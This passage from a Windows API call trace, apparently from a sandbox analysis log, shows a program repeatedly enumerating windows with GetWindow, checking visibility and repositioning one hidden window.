returned 0x200d6 [0057.524] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.524] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.524] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.524] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.524] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.524] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.524] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.524] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.524] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.524] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.524] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.524] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.524] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.524] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.524] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.524] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.524] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.524] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.524] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.524] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.524] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.524] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.524] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.524] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.524] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.524] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.524] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.524] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.524] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.524] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.524] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.525] GetWindow (hWnd=0x10190, 
uCmd=0x2) returned 0x1018e [0057.525] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.525] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.525] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.525] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.525] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.525] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.525] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.525] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.525] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.525] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.525] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.525] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.525] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.525] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.525] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.525] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.525] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.525] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.525] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.525] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.525] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.525] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.525] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.525] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.525] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.525] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.525] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.525] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.525] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.525] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.525] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.526] 
GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.526] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.526] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.526] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.526] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.526] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.526] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.526] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.526] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.526] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.526] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.526] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.526] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.526] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.526] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.526] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.526] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.526] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.526] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.526] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.526] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.526] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.526] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.526] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.526] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.526] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.526] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.526] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.526] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.526] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.526] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.527] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 
0x100f2 [0057.527] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.527] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.527] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.527] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.527] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.527] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.527] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.527] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.527] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.527] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.527] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.527] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.527] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.527] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.527] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.527] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.527] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.527] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.527] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.527] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.527] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.527] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.527] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.527] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.527] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.527] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.527] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.527] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.528] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.528] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 
[0057.528] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.528] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.528] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.528] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.528] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.528] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.528] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.528] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.528] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.528] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.528] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.528] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.528] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.528] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.528] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.528] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.528] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.528] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.528] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.528] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.528] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.528] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.528] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.528] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.528] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.528] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.528] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.528] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.529] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.529] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.529] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.529] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 
0x101b8 [0057.529] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.529] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.529] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.529] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.529] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.529] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.529] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.529] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.529] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.529] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.529] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.529] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.529] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.529] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.529] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.529] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.529] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.529] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.529] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.529] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.529] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.530] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.530] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.530] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.530] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.530] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.530] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.530] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.530] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.530] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.530] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.530] GetWindow (hWnd=0x1015a, 
uCmd=0x2) returned 0x10156 [0057.530] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.530] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.530] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.530] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.530] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.530] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.530] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.530] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.530] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.530] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.530] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.530] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.530] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.531] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.531] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.531] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.531] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.531] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.531] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.531] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.531] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.531] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.531] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.531] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.531] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.531] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.531] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.531] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.531] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.531] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.531] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.531] 
GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.531] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.531] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.531] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.531] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.531] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.532] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.532] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.532] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.532] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.532] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.532] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.532] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.532] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.532] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.532] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.532] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.532] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.532] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.532] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.532] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.532] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.532] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.532] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.532] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.532] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.532] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.532] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.532] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.532] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.533] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) 
returned 0x0 [0057.533] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.533] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.533] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.533] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.533] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.533] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.533] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.533] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.533] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.533] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.533] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.533] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.533] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.533] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.533] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.533] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.533] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.533] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.533] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.533] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.533] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.533] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.533] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.533] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.533] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.533] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.533] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.534] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.534] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.534] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.534] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.534] 
GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.534] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.534] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.534] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.534] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.534] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.534] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.534] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.534] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.534] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.534] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.534] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.534] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.534] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.534] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.534] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.534] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.534] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.534] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.534] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.534] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.534] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.534] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.534] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.534] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.534] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.534] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.534] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.535] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.535] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.535] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.535] GetWindow (hWnd=0x10162, uCmd=0x2) returned 
0x1015c [0057.535] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.535] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.535] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.535] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.535] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.535] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.535] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.535] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.535] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.535] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.535] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.535] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.535] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.535] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.535] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.535] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.535] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.535] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.535] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.535] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.535] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.535] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.535] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.535] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.535] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.535] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.535] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.535] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.536] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.536] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.536] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.536] GetWindow (hWnd=0x2009e, 
uCmd=0x2) returned 0x2008c [0057.536] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.536] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.536] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.536] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.536] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.536] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.536] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.536] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.536] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.536] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.536] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.536] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.536] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.536] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.536] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.536] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.536] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.536] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.536] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.536] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.536] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.536] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.536] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.536] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.536] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.536] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.536] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.537] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 